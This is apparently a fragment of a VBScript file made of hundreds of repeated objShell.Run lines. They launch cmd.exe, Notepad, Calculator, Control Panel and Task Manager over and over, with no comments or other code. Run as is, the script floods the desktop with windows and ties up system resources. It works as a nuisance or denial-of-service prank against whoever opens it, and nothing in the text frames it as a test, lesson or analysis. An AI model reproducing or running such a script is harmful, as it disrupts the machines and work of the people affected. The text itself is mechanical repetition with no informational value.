objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
